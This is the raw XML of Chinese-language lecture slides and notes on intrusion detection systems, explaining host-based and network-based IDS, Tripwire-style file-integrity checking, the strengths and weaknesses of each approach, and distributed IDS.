              <a:ea typeface="黑体" panose="02010609060101010101"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网络连接检测是对试图进入该主机的数据流进行检测，分析确定是否有入侵行为，避免或减少这些数据流进入主机系统后造成损害</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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主机系统检测则是通过检测入侵行为在主机的各种相关文件中留下的痕迹，帮助系统管理员发现入侵行为或入侵企图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主机系统检测的对象主要包括：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、系统日志：日志中记录了各种类型的信息，包括各用户的行为记录。如果日志文件中存在着异常的记录，就可以认为已经或正在发生网络入侵行为。这些异常包括不正常的反复登录失败记录、未授权用户越权访问重要文件、非正常登录行为等等。</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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、文件系统：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>恶意的网络攻击者会修改网络主机上包含重要信息的各种数据文件，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>也可能会删除或者替换某些文件，或者尽量修改各种日志记录来销毁他们的攻击行为可能留下的痕迹。入侵检测系统发现文件系统发生了异常的改变，例如一些受限访问的目录或文件被非正常地创建、修改或删除，就可以怀疑发生了网络入侵行为</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、进程记录：攻击者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可能将程序的进程分解，致使程序中止，或者令程序执行违背系统用户意图的操作，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果入侵检测系统发现某个进程存在着异常的行为，就可以怀疑有网络入侵。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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在基于主机的入侵检测系统中，包括如下的一些关键技术：</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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、文件和注册表保护技术</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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、网络安全防护技术</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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>保护技术</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、文件完整性分析技术等等</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ym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>总结</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的特点，其优缺点也比较明显。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的优点包括；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、检测准确度较高</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、可以检测没有明显行为特征的入侵</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、能够对不同的系统进行有针对性的检测</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、成本较低</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、不会因为捕获网络流量影响性能</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、特别适用于加密或者交换网络环境。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>其缺点主要包括：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、检测的实时性较差</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、无法检测数据包的全部内容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、占用了一定的主机资源</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、隐蔽性较差</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、不能通过分析主机的审计记录来检测诸如域名欺骗、端口扫描等网络攻击</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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Tripwire是最为著名的unix下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件系统完整性检查的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>入侵检测系统。</a:t>
            </a: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该系统</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>采用的技术核心就是对每个要监控的文件产生一个数字签名，保留下来。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>检测</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件现在的数字签名与保留的数字签名不一致时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>则判断发生了入侵行为；</a:t>
            </a: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并且能够在一定程度上回复被破坏的文件。</a:t>
            </a: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同时，该软件也遵循通用公共许可证。</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总结</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的特点，他们各自存在优点，也有各自的不足。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为什么不将两种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>结合起来，互相取长补短呢？</a:t>
            </a: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altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>提供早期报警，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>来验证攻击是否取得成功。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>又例如：在网络中部署</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>来检测来自其它主机的攻击，而在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>E-mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等重要但是以遭受入侵的服务器上部署</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>让两种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>共同维护网络系统安全。</a:t>
            </a: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altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分布式入侵检测系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>就应运而生了。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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本章我们将讨论入侵检测技术，主要从以下几个方面来进行。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>首先，会向大家</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>介绍入侵检测的一些基本概念；接着谈一谈入侵检测的原理；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在此基础上，我们讨论几种主流的入侵检测系统，包括：基于网络的入侵检测系统（也就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>NIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）、基于主机的入侵检测系统（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）和分布式入侵检测系统（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>接下来，和大家聊一聊进行入侵检测系统设计的需要考虑的重点问题和典型的部署结构；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>最后谈一谈入侵检测系统的发展趋势和方向。</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D448C87-023D-4E49-B603-34FECE4E8D7D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
